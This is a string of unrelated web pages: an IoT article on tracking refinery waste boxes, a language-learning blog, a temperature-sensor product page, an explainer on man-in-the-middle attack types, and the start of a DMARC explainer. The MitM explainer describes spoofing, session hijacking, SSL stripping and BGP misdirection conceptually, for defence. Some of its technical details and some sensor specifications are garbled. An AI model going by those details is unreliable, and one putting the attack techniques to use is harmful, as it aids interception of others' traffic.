Our equipment fleet is composed of very large, somewhat portable, assets. Given that our standard operating environment can vary from the scorching desert to extreme industrial environments, it's challenging to instrument everything. Actually attaching our IoT sensor arrays presents a challenge. In some cases, they can be hard wired, but in many cases, innovative enclosures and connectors have to be created to attach to our tanks, pumps, and pipes.
Let’s look at another example. One of our large customers operates a refinery in the southeastUnited States.For a refinery, time is money and each day they produce fuels and feedstocks for industrial applications. Refineries also have to shutdown operations to clean up, and get ready for another cycle of operations-knownas turn arounds. One of the most important considerations during a turn-aroundis safety, environmental cleanliness, and of course, time. These turn arounds involve safely managing hundreds of tons of waste product, and responsibly managing that product from start to final disposition.
Rain for Rent provides boxes, and box management technology that allowed the customer to leverage our IoT strategy. These boxes are about the size of a shipping container and are generally moved by large forklifts, taking a fair amount of abuse as they are loaded and unloaded. For our IoT strategy to work, our engineers had to figure out a way to attach the GPS/sensors to the boxes in an enclosure that could resist a direct blow from the forks on an industrial forklift.
Our IoT technology enables geo-fences to be establishedaround specific work areas totrack box contents, box movement, and time on rent. Obviously this information is highly sensitive and extremely auditable. We were able to assist the customer in managing their turn arounds, shaving days off, increasing the safety and visibility of the waste products, while saving them hundreds of man hours of time. Itis critically important to all parties to provide a level of security and visibility into waste tracking that had previously taken months to accomplish.
As we look to the past for an indication of how adoption of IoT will be, we’re reminded at just how rapid Digital Revolution changes have been. Consider the rate of adoption of simple cell phones and Internet usage over 20 years. In 1990, cell phone subscribers made up just 0.25percent of the world population, but increased to 68 percent in 2010. Additionally, just 0.05 percent of the world population was using the internet in 1990, but in 2010 that utilization increased to 26.6 percent.
When evaluating any new opportunity, I like to ask myself, “What advice would I give my current self, if I could look back at today from 10 years in the future?” I believe that IoT is going to encompass every aspect of our lives by 2020, and we need to be prudent, secure, as well as aggressive in its implementation. This latest “big thing” represents a vast opportunity for all of us. Similar to all of the other the rapid changes that have characterized this Digital Revolution from the 1970’s until today, the changes will be both incremental and profound.
Check Out : Top Water Management Solution companies | <urn:uuid:2874e7d7-0cbb-45b7-aaf4-05f3310ad96f> | CC-MAIN-2022-40 | https://internet-of-things.cioreview.com/cioviewpoint/iot-facilitates-enhancements-to-water-management-systems-nid-15478-cid-133.html?utm_source=google&utm_campaign=cioreview_topslider | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00295.warc.gz | en | 0.951606 | 1,354 | 2.765625 | 3 |
Do you know the best language learning tips?
My 13-year-old cousin watches all the movies in the original English language. “I want to study English later and travel a lot”. You can see the motivation in her shining eyes. “It makes me learn faster and better. School lessons don’t necessarily help.”
Her story made me sit up and take notice. Contrary to the belief that young people and children are no longer interested in anything today, there is evidence to suggest otherwise. “Many of my friends and I already speak English quite well. But we didn’t get that from school.”
Index cards and vocabulary lists are out. We asked students why: “Because it’s boring,” “Because it doesn’t do any good anyway,” “Because I don’t feel like looking at the pile of cards anymore.”
Parents who notice a gap in their child’s knowledge of a foreign language usually urge them to “finally learn the words.” They are not entirely wrong about this since vocabulary is the foundation for understanding a language. But the big difference lies in how you learn the words.
According to current psychological understanding, institutional language learning should be fundamentally and radically changed. Why this is not happening, we can only guess, which is why we prefer to offer you a practical solution: The Birkenbihl Approach.
Best Language Learning: The Birkenbihl Approach
For those who learn a new language as a child, teenager or adult in their natural environment (e.g. bilingually or in a foreign language school/kindergarten), their brain processes the new language in a similar way to their mother tongue. Based on this information, management trainer and bestselling author Vera F. Birkenbihl developed the Birkenbihl Approach for language learning.
The Birkenbihl Approach, based on decoding (word-for-word translation), allows you to learn the meaning of the words of the foreign language at the same time as the grammar.
By decoding, you can progress much faster. Let’s do an exercise:
Read the above German sentence and English decoding several times. Now cover the decoding and try to decode the German words yourself. How many words have you translated correctly after such a short time? It’s so easy that you usually get over 90 % right the first time you try it. With a little practice, you quickly reach 100 %. Voilà! You have already mastered a whole meaningful sentence in a foreign language. Isn’t that great?
We recommend writing approx. 2 to 3 sentences of the foreign-language text on a sheet of paper. An A3 sheet is best ― as there is enough space on it for comments, drawings and anything else that makes it easier to remember. Of course, decoding also works digitally, e.g. with a text tool like Word.
All details and step-by-step instructions for decoding are in our blog post: Easy language learning by Vera F. Birkenbihl ― The Decoding Method.
The Birkenbihl method is originally a 4-step method:
1. Decode: Word-for-word translation of a foreign-language text into the native language.
2. Karaoke listening: Listen to the recording of the text and read the word-for-word translation until you understand the meaning of each word.
3. Background Listening: Passive listening to the previously actively heard text as you pursue other things in everyday life. No active concentration is necessary.
4. Activities: Speak the text yourself, have conversations in everyday life, and practise dialogues.
We now know that the method can be even simpler. The steps don’t have to follow strictly one after the other. You can, for example, start with background listening and tune into a foreign language (like during a stay abroad, where you are surrounded by it). There are also different ways you can do the word-for-word translation, but more about that later.
The significant advantages of the Birkenbihl Approach are apparent: With this method, your brain learns a new language in a very natural way ― without even memorizing a word or grammar rules. Instead, you simulate learning your mother tongue, using it, so to speak as a learning turbo.
The method is best suited for students because you can divide the steps optimally between classroom instruction and learning at home. Activities mainly take place in school ― speaking, reading, grammar exercises, deepening knowledge. At home, students can thoroughly prepare for the lesson, learn ahead, relearn and repeat. All they need is foreign language texts. Texts from textbooks that are used later in class are ideally suited for this purpose. In addition to the texts, there are usually audio recordings on a CD or as an mp3 download. Foreign language teaching is, therefore, an optimal prerequisite for the use of the Birkenbihl Approach!
Today we want to show you how pupils use the Birkenbihl Approach most effectively ― for good pupils who want to learn even more (like my cousin) and for pupils who have some catching up to do and have a hard time in school.
How Pupils Make Optimum Use of the Birkenbihl Approach
If you use the Birkenbihl Approach parallel to your school lessons, it is essential to work in advance. For this, you must use the audio material of the workbook. Go through phases 1 to 3 before the lesson in class!
Phase 1: Decoding
Translate the words of a lesson you already know. If you learn with a friend, you can also compare it with them and add more translations to your text. For the translation of unknown words, use the workbook or (online) dictionaries. In the beginning, you have to translate all the words because you have little previous knowledge. It only takes a little time, and then you only decode new words.
If a translation into another foreign language is easier for you than into your mother tongue, or if you want to include links and mnemonics, you can also decode some words into other languages. Drawings of the meanings of words are, of course, also allowed.
Phase 2: Karaoke Listening
To do this, use the listening material for the course. The order of the learning process in schools is usually unsuitable, as teachers often require speaking a foreign language from the very first lesson. But how do you know how to pronounce words if you’ve never heard them before? Children first hear their language for months before they make their first attempts at speaking. In the beginning, you make mistakes, which you usually correct yourself later. So listen to the lessons several times and read the decoding until you know the meaning of the words and the pronunciation.
Phase 3: Background Listening
By repeatedly listening to the foreign language in the background, you acquire a perfect pronunciation, preparing you for speaking the language in class ― and later in everyday life.
At school: strengthen and practicing
With such excellent preparation, the lessons in school become an activity. Even if grammar rules and other theoretical things like that are part of the lessons, you understand the content now, as you have already acquired some knowledge. Grammar exercises become fun for you.
How do pupils who have problems at school using the Birkenbihl approach?
If we are honest with ourselves, we prefer to do things we are competent in, things we get good feedback for and tasks that give us pleasure. We don’t like to face things we feel overwhelmed by and which lack any fun. Therefore, the first hurdle of working with this new strategy can be a significant burden. Your child may resist. But one thing is sure: After a few days, your child will also recognize the benefits, notice that something is going on, and consequently develop self-motivation. For the time being, the aim should not be to achieve a better mark immediately in the next exam but to increase motivation and gain a certain familiarity with the foreign language. So dear parents: Hang in there.
The student then goes back 3 lessons and translates the words of the previous lessons word by word. Doing this, the pupil quickly catches up with the subject matter. Just 10 minutes a day helps enormously! Once the lessons dealt with at school have been made up, it is advisable to “discover” one or two lessons in advance. With this preparation, students are prepared for the lessons and have more fun in the classroom. The lesson then becomes an exercise ― to train pronunciation, to truly understand grammar and to be able to put it into practice. It is fun, and it motivates them to continue and learn. Save yourself expensive tuition!
Additional exercise: speak in chorus.
Listen to a known text and talk with the audio “in chorus.” This step helps you to strengthen your knowledge of word meanings and grammar and refines your pronunciation.
The effect: things that you practice well can then be performed more confidently, i.e. speaking, becomes easier after this exercise. This exercise also works if you practise speaking in your mind, i.e. only speak in thought. Use also feelings and pictures for guiding. Put yourself in the speaker’s place; visualize the pictures of the story in front of you.
Best Language Learning Tips: Practice with Listening Comprehensions, Films, and Series
Watching a series is fun for all students. In connection with the foreign language, this can be an excellent incentive to continue learning. Experience has shown that there is little resistance from young learners here.
A Movie or series can be an excellent introduction to learning: watch a 20-minute series, then decode a textbook text. The brain prepares and dives into the world of the foreign language. Or you work entirely with the text of a series or a film. The scripts for the films are usually on the Internet. They can first be decoded independently, á la Birkenbihl. Then you have the reward of watching the film or series.
The biggest problem when learning a language through watching movies and television series is the speed of the audio, especially at the beginning. It’s simply too fast; the pupils can’t follow and don’t understand very much if anything at all. Brain-Friendly offers a solution for this.
Brain-Friendly.com has developed Birkenbihl language courses based on a funny series. You watch the show, and a two-line text (similar to a subtitle) appears at the bottom of the screen. This text is the decoding: above the foreign language, below the word-for-word translation into English. Parallel to the visual, the word pair lights up ― like in karaoke singing. So the student can read the text very well. The speed can be adjusted. So you use a slower speed at the beginning, then you can increase it to the original speed.
Radio and Your Favourite Song
The same works with songs, by the way. The lyrics can be decoded themselves and then listened to in an endless loop. It’s lots of fun, and you find out what the songs are really about. In many cases, they want to say something completely different than one would initially assume. (More tips on learning with music are here: Learning is Fun ― Learn a Language by Listening to Music.
Following a program from a foreign radio station can also help to improve listening comprehension considerably. For example, you can recommend your child to choose a French, Spanish or German language channel suited to their musical taste. Due to the possibility of Internet radio, the selection is so vast that almost every young person should find a suitable program.
The 3 Best Reasons to (Pre-)Learn as a Student with the Birkenbihl Approach
1. Brain-Friendly Learning Steps
First, immerse yourself in the foreign language of choice, then learn the rules. Those who do not learn grammar do not know the corresponding grammatical terms. However, those who learn at school or for a particular type of certification, where these terms are important, won’t learn them with the Birkenbihl Approach. The good news is that the lessons are full of grammar rules. Students, therefore, use the Birkenbihl Approach at home as preparation and to repeat and strengthen. In class, when discussing grammar, students can do very well and truly understand the rules. Now that the content of an example sentence is understood, the rules make sense.
2. Experience of Success in Classrooms
If you traditionally learn vocabulary, for example, Dog=Hund, then you have the feeling that you have learned this word. (It would go beyond the scope of this article to explain why this is a deceptive feeling.) Vocabulary trainer apps additionally support this positive feeling by giving points for each correctly translated term. Just because you understand a single word doesn’t mean you win anything. And this happens for pupils in the class. Children get tired of single words and try to understand the teacher’s instructions.
If you use the Birkenbihl Approach, it works uniquely. The feeling of success comes when you understand a whole sentence or text. The child who uses the Birkenbihl Method can answer intuitively and automatically. It learns brain-friendly and holistically.
The difference is that the brain does not “depend” on individual terms, but learns, understands and reacts holistically. The exercise makes the master: The more often the child uses the Birkenbihl Approach at home, the easier it is to use the language in class. The lessons become games and exercises ― to strengthen and expand their skills.
3. Thinking in the Foreign Language
If you learn a vocabulary pair, such as “Messer-knife,” the brain must always translate first when using a foreign language. Only then you can decipher the meaning of the whole sentence and then you can react. You’ll notice, it just takes too long. The Birkenbihl Approach avoids this problem. By learning in whole sentences, you always have a whole sentence, “ready.” You don’t have to think about what “knife” means in German but use the term intuitively. You think in the foreign language right from the start. This level is challenging to attain with traditional school teaching. Pupils are engaged far too little with the language (this is, of course, due to the limited time they spend in class, but also to the lack of motivation to do more at home). Only those who study a foreign language at university or use a foreign language daily at work begin to think in the language and thus use it automatically. The Birkenbihl Approach shortens this process. Pupils can also immerse themselves in the foreign language within a short time and learn it sustainably. | <urn:uuid:c5d7fac8-140c-4bd2-a7c7-39e184949007> | CC-MAIN-2022-40 | https://blog.brain-friendly.com/the-best-language-learning-tips-for-students/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00295.warc.gz | en | 0.941861 | 3,119 | 2.796875 | 3 |
The Temperature/Humidity Sensor, used in conjunction with the NetGuardian or the KDA (with analog card), allows a network manager to monitor the environmental status of a network site. The unit measures the temperature and relative humidity of the immediate network area, thus providing pertinent environmental information from equipment site.
The Temperature/Humidity Sensor measures temperatures between+ 23 - +131 degrees Fahrenheit (-5 to +55 degrees Celsius). It also gauges relative humidity between the range of 10% RH to 90% RH. The NetGuardian or KDA(with an analog card) send alarm notifications to the network managers, via analog alarm inputs, if either the temperature of the relative humidity approaches levels that are too high or too low. Proper equipment operation thresholds are determined by the user, which when exceeded, will trigger an alarm condition.
|RH Range:||10% RH to 90% RH.|
|Accuracy:||+/- 3% RH.|
|Input Voltage Range:||10 to 28 VDC.|
|Temperature Range:||-23 degrees F to +131 degrees F (-5 degrees C to +55 degrees C).|
|Accuracy:||+/- 0.54 degrees F (+/- 0.3 degrees C).|
|Total current draw:||4 mA.|
|Dimensions:||80mm x 80 mm x 26mm.|
|Weight:||8 oz. max.|
A temperature sensor is one of the most simple, yet the most critical, pieces of equipment available to monitor your server room, server closet, data center, or other telecom environment.
Frequently, temperature monitoring using temperature sensors is ignored or overlooked by network operators. Unfortunately, it is incredibly important (and also quite inexpensive) to monitor temperature in telecom and IT environments. Both extreme cold and high temperatures present a danger to your valuable telecom investment, and you must take care to monitor for both of these potential threats.
| Temperature Sensor |
| Temperature Monitoring System |
|Remote Temperature Monitoring||Environmental Monitoring|
You need to see DPS gear in action. Get a live demo with our engineers.
Download our free Monitoring Fundamentals Tutorial.
An introduction to Monitoring Fundamentals strictly from the perspective of telecom network alarm management.
Have a specific question? Ask our team of expert engineers and get a specific answer!
Sign up for the next DPS Factory Training!
Whether you're new to our equipment or you've used it for years, DPS factory training is the best way to get more from your monitoring.Reserve Your Seat Today | <urn:uuid:78d50024-ba65-4b76-a368-2243566f3826> | CC-MAIN-2022-40 | https://ih1.dpstele.com/network-monitoring/temperature/sensors-humidity-water.php | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337853.66/warc/CC-MAIN-20221006155805-20221006185805-00295.warc.gz | en | 0.842625 | 558 | 2.84375 | 3 |
Malwarebytes reported a massive surge of 1,677% in the detection of spyware between January 1 and June 30, 2020. In a man in the middle attack, the attacker spies on the conversation between the server and client, using malware or other methods to do it. To combat and prevent these types of attacks, it helps to understand them first. So, let’s explore the types of man in the middle attacks that you need to know about…
Have you ever watched an action movie where a good spy (like James Bond or Black Widow) intercepts a secret communication? This person is what’s known as a man in the middle attacker, but we don’t mind in this case because they’re a “good guy/gal” in the film. But in a real world man in the middle attack, a MitM attacker’s intentions typically aren’t so good. Instead, a cybercriminal places themselves between two communicating parties so that they can intercept, read, and alter the data. The attacker can place themselves at any point along the communication chain to carry out this type of cyber attack.
But what are the different types of man in the middle attacks? Let’s explore them all more in depth.
Breaking Down 8 Types of Man in the Middle Attacks
A man in the middle attack can be used alone or as part of a bigger scheme. Either way, the purpose behind the attack is gaining information or money. A man in the middle attack, which can be carried out from any layer of the protocols governing the communication chain, can be separated into different types according to how an attacker carries it out (i.e., what methods they use).
But first, if you’re not sure what a man in the middle attack is, we’ve explained it all here.
Method 1: Attack on Encryption
Attacks on encryption can be launched on any of the three OSI layers — application, presentation, and transport.
Security protocols like SSL/TLS are used to secure the communication channel between the client and the server. However, sometimes cybercriminals manage to bypass or manipulate these security protocols to intercept a so-called “secure” communications. There are three types of man in the middle attacks on encryption. Let’s have a look.
1. HTTPS Spoofing
For this first type of man in the middle attack on our list, some experts say it’s a MitM attack while others say it’s a phishing attack method instead. With HTTPS spoofing, a criminal creates a fake HTTPS website by spoofing the address of a legitimate website. Then they send a link for this fake website to unsuspecting users who visit the fake site, opening themselves up to attack.
How Does an HTTPS Spoofing Attack Work?
In April 2017, Xudong Zheng presented a proof of concept to prove how he could manipulate the user into believing that they were accessing the legitimate Apple website when actually it was, in reality, an imposter website. This is by using special characters that visually look identical to the English language alphabet.
Xudong Zheng wanted to show how it was possible to register domains with foreign characters using Punycode. When Unicode characters were used to register the domain name “xn-pple-43d.com”, the equivalent domain name that was visually represented was “apple.com.” This fake site used Cyrillic “a” (U+0430) instead of the ASCII “a” (U+0061). This spoofing attack is also called script spoofing.
As many Unicode characters are difficult to distinguish from ASCII characters, cybercriminals can use them to register phony websites. The attackers can not only register DNS names that look like the original DNS, but they can also get low-level SSL certificates (i.e., domain validation certificates) for these websites to try to make them seem more legitimate. When an attacker sends the URL of a dodgy site to their target, the unsuspecting victim clicks on the URL and falls right into the criminal’s trap. This type of attack is also known as a homograph attack or internationalized domain name (IDN) homograph attack.
While the bad guys use homographic (also known as homoglyphic) attacks, the good guys have been working to protect us. Google Chrome version 51 and later, Microsoft Edge, Firefox, and Opera block sites that use more than one language for their IDN, and many browsers also warn users when they try to access such malicious sites.
The simplest way to avoid such scams is to never click on URLs sent to you via emails, messages, or pop-ups. If you want to visit a website, you should manually type the website name in your browser to shield yourself from a man in the middle attack.
2. SSL Hijacking
SSL hijacking attacks are man in the middle attacks in which the criminal hijacks a user’s legitimate session and pretends to be that user. The server will not know that the person making the transaction is not the intended user.
SSL hijacking attacks are also known as session hijacking or cookie jacking attacks. SSL hijacking involves stealing session ID/session key to gain unauthorized control over the victim’s session.
How Does an SSL Hijacking Attack Work?
Once the criminal gains control of the session, they can do everything a user is authorized to do on their account— transfer or withdraw money, buy stuff, even change the victim’s account details. The previous figure is a representation of an SSL hijacking attack.
So, the question is, how does a criminal get ahold of a session key for the attack? These are some mistakes that website owners and users make that makes the session vulnerable:
- Using predictable variables to generate a session ID: It becomes easier to guess a session ID when it is generated using predictable variables like login date and time, IP address, or previous session ID. Although this practice is becoming increasingly uncommon, some websites make the mistake of using such IDs. A cybercriminal can easily use a brute force attack to guess these predictable versions of the session ID.
- Securing only a part of the website rather than the full website: Some website owners prefer to use SSL certificates on the login and payment pages but choose to save money on the other pages. Cybercriminals can easily access the communication when the user clicks on an unsecured page. The threat actor can also access the cookies that will have information about the login page.
- Clicking on links in phishing emails: The bad guys are known to send phishing emails with session IDs to the users. When the user clicks on the link, they will start a session on the account with this attacker-defined session ID. These types of attacks are known as session fixation attacks.
- Buying hardware from unreliable sources: When a user sources hardware from unreliable merchants, the hardware might be loaded with malware. Usually, this malware is designed to steal user information from the hardware’s owner and send it to the cybercriminal. The bad guys can also steal the cookies from the user’s device and gain access to their sessions.
3. SSL Stripping
SSL stripping, also known as a downgrade attack, is a type of man in the middle attack where the criminal reduces the security of a website’s connection so they can access the communications between a client and the server it connects to.
What is the number one method used for website security? It’s TLS, of course. The TLS protocol is developed to secure the communication between the website and the server, and it works. But guess what, the cybercriminals still find a way around it to launch MitM attacks.
Computer security researcher Moxie Marlinspike presented a security flaw at Black Hat 2009 in Washington D.C. He showed that HTTP sites are loaded first, quickly followed by the SSL certificate. The result is a secure HTTPS connection. But in the short time before the SSL certificate is loaded, an attacker has a tiny window of opportunity where they can send the unsecured HTTP site to the user instead of the secure version. The result?
- The user will continue their communication, thinking they are secure.
- The server will also think there is a secure connection with a legitimate user.
- Meanwhile, the MitM has access to a secure connection with the server and an open connection with the user. This means that the attacker can access everything passed between the user and server.
How Does an SSL Stripping Attack Work?
When the user makes a request for an HTTPS website, the attacker downgrades the HTTPS to an HTTP version of the same website. The HTTP version is not secure, and the attacker can read everything between the client and the server. They can also alter and manipulate the whole conversation. An SSL stripping attack looks like this:
There are four steps involved in an SSL stripping attack:
- The user requests access to “https://example.com”
- The MitM passes on the user request to the server
- The server responds with the secure site “https://example.com”
- The MitM exploits the vulnerability and sends unsecured site “http://example.com” to the user
This may leave you wondering how a cybercriminal can degrade the security protocol. They can do this in one of three ways:
- Manually setting the proxy of the browser to route all traffic
- Using ARP poisoning
- Creating a hotspot and getting victims to connect to it
To avoid SSL stripping attacks, always check that you are working on an HTTPS site and have not shifted to an HTTP page during the session. Being mindful about the URL goes a long way to prevent greater woes. Another way to defend yourself against SSL stripping is by implementing HSTS policy – a stringent policy where only HTTPS sites are allowed to load.
Method 2: Interception
With this method, the cybercriminal uses the communication protocol layers to intercept the conversation between two nodes on the internet. A criminal might just observe the data transferred from a place on the network near the communicating devices, or they can redirect the whole traffic through a node controlled by them. There are five types of man in the middle attacks that use interception:
4. IP Spoofing
When a cybercriminal spoofs the IP headers of the TCP packets transferred between two devices that trust each other, they can redirect the traffic to their chosen location. This is known as IP spoofing. An IP spoofing attack is most commonly used to create a backdoor to the victim’s IT systems by gaining root access to the host. The attack capitalizes on the trust between the two devices and is typically used as part of a larger scheme to launch a cyber attack on the target.
Data is transferred on the internet by using an internet protocol (IP) that packages it into packets. The packet headers contain the identity of the sender and the receiver in the form of IP addresses. If an attacker changes the sender’s IP address on the data header, it will look like it has come from the spoofed IP address. IP is a stateless protocol, so no data from the previous sessions are retained.
How Does an IP Spoofing Attack Work?
First, the attacker finds the IP address of the trusted host in a network. Cybercriminals are well versed in predicting TCP sequence numbers to construct a TCP packet on their own. They’ll send a message to the computer by altering the packet headers to give an impression that they’re coming from that trusted host. As it is a trusted host, the target might start communicating without further inquiries.
Unfortunately, this attack is possible because the routers totally ignore the sender’s IP address, concentrating on the destination IP address. The attacker might even change the routing table to redirect the traffic on the victim network to the node he controls. The computers on the victim network might not even be aware of the forged route and continue to communicate.
The attacker can be a silent observer but can also send emails or documents from the official email address of anybody from the target company.
IP spoofing happens while the three-way TCP handshake is carried out between the client and the server. The following steps are followed in a normal TCP handshake:
- Client sends sequence number, SYNx, to server
- Server responds with Acknowledgement ACK(x+1) + SYNy
- Client responds with ACK (y+1)
The attacker replies to the server with an estimation of “y” before the client can reply. If their estimation is correct, the server will think that they are the real client. IP spoofing is only possible if the attacker responds with a correct answer before the client, so this is a challenging attack to pull off.
5. ARP Spoofing
Next on our list of the types of man in the middle attacks is ARP spoofing. An ARP spoofing attack allows bad guys to intercept specific types of communications between network devices. More specifically, ARP spoofing allows an attacker to send a phony address resolution protocol (ARP) message via a local area network (LAN) to deceive the server into trusting it, ultimately misdirecting all the traffic to their device.
How Does an ARP Spoofing Attack Work?
The figure shown below will help you understand the concept better. As you can see, four devices are connected to a LAN with gateway 220.127.116.11. All the traffic that goes out to the server has to go through LAN. A criminal will disguise their device as one of the devices of the network to penetrate it.
Under ideal circumstances, the following steps take place:
- A network device sends a broadcast ARP request to locate a MAC address that corresponds to an IPv4 address.
- A legitimate device with an IP address that matches the request sends a reply.
- The device sending the request will cache the ARP reply in the ARP table.
The story gets interesting when a man in the middle gets in. The attacker sends back the reply when any network device shouts out to locate a MAC address. If the attacker manages to map their MAC address to an authentic IP address, they are in a position to receive every communication meant for the legitimate device.
Sometimes the attacker goes a step further and sends an ARP message with the IP address of the default gateway to capture all traffic on the LAN. All devices on the network will map the attacker’s IP address as the default gateway. This is called ARP poisoning, as the ARP tables of the devices are ‘poisoned’ with the attacker’s IP address.
Some people use the terms ‘ARP spoofing’ and ‘ARP poisoning’ interchangeably. However, there is a difference between the two. In ARP spoofing, the attacker will send their MAC address in response to a request from a device on the LAN. So, they spoof the ARP for impersonating the victim. On the other hand, in ARP poisoning, the attacker will go ahead and modify the ARP tables of one or more devices on the LAN.
6. Automatic Proxy Discovery Attack
A web proxy is established in enterprises where security is a primary concern. All the web traffic passes through the proxy server after a thorough inspection of all the application layers for possible threats. WPAD (web proxy auto-discovery) is a protocol designed to assist clients in discovering the proxy automatically.
Although automatic proxy discovery saves time for the programmer as they don’t have to configure every device, WPAD is susceptible to MitM attacks. If the system administrator doesn’t want to configure the proxy server locally, they have two options for publishing the location of the proxy file:
- DHCP (dynamic host configuration protocol): The web browser first looks for the proxy configuration on the DHCP server before it turns to DNS. DHCP is built on UDP and IP. A cybercriminal might set up a malicious DHCP server and send a single spoofed UDP packet with details about the proxy configuration to the browser to launch a DHCP attack. The installation of proper firewalls can protect you from this kind of attack.
- DNS (domain name system): Like DHCP, DNS also uses UDP; therefore, cybercriminals can intercept the communication by altering the proxy configuration packet. Additionally, when an organization uses the highest level of the domain to enable WPAD, attackers might benefit by spoofing a subdomain under the primary domain. For instance, if the browser query for x.y.z.com is sent, the DNS server will first query x.y.z.com. If there is no reply, it will query y.z.com. If there is no reply there, too, the browser will query z.com. If the organization has used z.com for enabling WPAD, the criminal might spoof another subdomain to launch an attack.
One method to protect yourself from an automatic proxy discovery attack is to turn off automatic proxy detection on your device. The following screenshot shows how to turn off automatic proxy detection in Windows.
7. DNS Spoofing
Next on our list of the types of man in the middle attacks: DNS spoofing. This type of attack occurs when a cybercriminal replaces a legitimate IP address in a DNS server’s records. By doing this, the attacker can misdirect site visitors’ clients to a fake website instead of the real one.
The domain name system (DNS) is a protocol for mapping the destination IP address when a request is raised by a client. When a request is raised for a specific website, the browser and the operating system (OS) looks for a corresponding entry from the memory cache or the device’s internal storage. If it doesn’t find it there, then it raises the query to search for that IP address through different servers. When it finds the matching IP address, it connects the client to it.
How Does a DNS Spoofing Attack Work?
With a fake DNS record, the user will be unaware that they are on a fake website and will use their login credentials to access their account. The MitM watches the fake website and can retrieve the client’s credentials from it. They can then use the credentials to log into the original website as the user, enabling them to retrieve all the information of the client.
The cybercriminal can go a step further and change the DNS records of a website to list their own website as the original one. This way, every time a client opens the website, they will be directed to the fake website. This method is called DNS poisoning or cache poisoning.
The DNS system is very much like an address book you keep to note down the addresses of your family and friends. If somebody changes the address on the address book, you might not know, but your letters will be delivered to the wrong person who can read and use them for malicious purposes. In the same manner, a cybercriminal spoofs the DNS records to carry out a DNS spoofing attack.
8. BGP Misdirection
BGP misdirection is an attack where a cybercriminal redirects the internet traffic to a malicious route by spoofing the IP prefixes.
The border gateway protocol (BGP) is the routing protocol for the internet. It is like a grid that connects all the networks to each other. Generally, the BGP protocol is responsible for finding the best route for the requests raised by the devices. The protocol accesses the DNS records of the website to direct any query from the clients to the correct IP address.
How Does a BGP Misdirection Attack Work?
So, what is BGP misdirection? Well, this type of man in the middle attack is exactly what the name implies — it’s a malicious misdirection of BGP protocol to reroute the traffic through a cybercriminal-controlled network. As traffic passes through this spoofed network, the bad guy will be able to intercept, read, or even change the data before it reaches its destination.
One of the contributing factors in making a BGP misdirection attack successful is that the server and the client are unaware that their data is intercepted. A cybercriminal can easily stay undetected and intercept a huge amount of traffic.
Let’s understand BGP misdirection with the help of an example. If you are around lower Manhattan and want to drive to Central Park you’ll follow the road signs and reach your destination. Normally, you won’t have to go through Brooklyn to reach Central Park. But what if a malicious person wants you to take a route via Brooklyn? They might tweak the road signs to misdirect the traffic so that it passes through Brooklyn. An unsuspecting person might not even realize they are being misdirected because ultimately, they will reach Central Park.
BGP is akin to a GPS system on your phone. It directs all the computing devices to their destination via the shortest possible route. However, cybercriminals use BGP misdirection to route all the desired traffic through a node under their control. This way, they can monitor and intercept the network traffic. The users and the server aren’t aware that redirection has taken place, and they continue to communicate as if no one is watching.
In a recent BGP misdirection event, Vodafone’s autonomous network based in India had a BGP routing leak that impacted many U.S. companies, including Google. Unusually, the leak was a result of a mistake, not a malicious attack. While the misdirection lasted for just 10 minutes, countless users around the world were affected, causing a huge spike in traffic. Basically, it became a self-inflicted DDoS attack for Vodafone.
SSL Beast (Browser Exploit Against SSL/TLS)
‘Beast’ stands for browser exploit against SSL/TLS. In an SSL beast attack, cybercriminals use the vulnerabilities created when a website uses outdated SSL/TLS certificates to gain access to the site’s communications. We’re including this on our list of the different types of man in the middle attacks because it’s something you should be aware of when trying to understand what the attacks are so you can prevent them from occurring in the future.
One of the best defenses against this type of MitM attack is having an SSL certificate for your website. However, if you are still using TLS 1.0 or any version of SSL, you are prone to an SSL beast attack. The SSL beast attack plays on vulnerabilities in these protocols to launch a man in the middle attack.
TLS encryption uses block ciphers with symmetric encryption. The popular block ciphers are DES, 3DES, and AES. SSL/TLS uses cipher block chaining (CBC) to chain the blocks with the previous one using logical XOR operation. Thus, the value of every block is dependent on the value of the previous block. The problem arises when it is time to send the last block. The last block might not have enough data to fill it, and so it’s padded with random content.
How Does an SSL Beast Exploit Attack Work?
If the attacker wants to break the code of encryption, they need to know the initialization vector for the string. They can break the block cipher by trying different combinations and comparing them using the initialization vector. If the block is 16 bytes, the attacker would have to try 25616 different combinations to guess it correctly. That’s a Herculean task.
To make it easier, the attacker carries out the SSL beast attack where they test a byte at a time. After the attacker guesses one byte correctly, they can block with 256 combinations of this byte. They carry out the same process for the next byte. The following figure represents the SSL beast attack.
Due to the complexity of the process, SSL beast attacks are not that common. However, if you are using any protocol below TLS 1.1 (which you shouldn’t be since it was deprecated), you should be warned that you are vulnerable to this type of attack. The obvious security option is to upgrade your security protocol regularly to keep your communication secure.
Final Words on the Different Types of MitM Attacks
We hope this article has answered your two-part question, “what are the different types of man in the middle attacks and how do they work?” As all of these types of MitM attacks are carried out using different techniques, they require different methods of prevention. We will learn about the detailed man in the middle attack prevention methods in our next article in this series.
Circling back to the movie spy character we mentioned at the beginning of the article… while these characters are the ones we cheer on in movies, real life often doesn’t match that idealistic model. In real life, we know this person is not always on the good guys’ side. And, if we encounter this person in real life, we certainly won’t give us a reason to cheer because now we know how dangerous these different types of man in the middle attacks can be. | <urn:uuid:f29b3c22-0b50-4f2e-b6db-8dba87d6cb27> | CC-MAIN-2022-40 | https://cheapsslsecurity.com/blog/types-of-man-in-the-middle-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00495.warc.gz | en | 0.923626 | 5,301 | 3.125 | 3 |
What is DMARC – All You Need to Know About the Most Effective Email Authentication Protocol
With people increasingly using emails for communication, malicious actors have more excellent opportunities to commit cybercrimes. Businesses should use email authentication protocols like SPF, DKIM, and DMARC as critical components of their cybersecurity strategy.
The internet has made it convenient for everyone to communicate using emails, and emails are the primary communication mode for most businesses. Rarely does an hour pass by without people working in organizations checking their official email accounts.
Unfortunately, while emails have increased the convenience levels, they have also provided more opportunities for malicious actors to transmit malware and try out other network infiltration activities to steal data and cause financial and reputational losses. While there are various ways to prevent falling prey to phishing attacks, using email authentication protocols like DMARC, SPF, and DKIM can help nip the problem in the bud. This article discusses DMARC in detail.
Some Eye-Opening Statistics on Email-related Threats
Here are some alarming statistics showing how grave the situation of email-borne cyberattacks like phishing and spoofing is on a company and individuals.
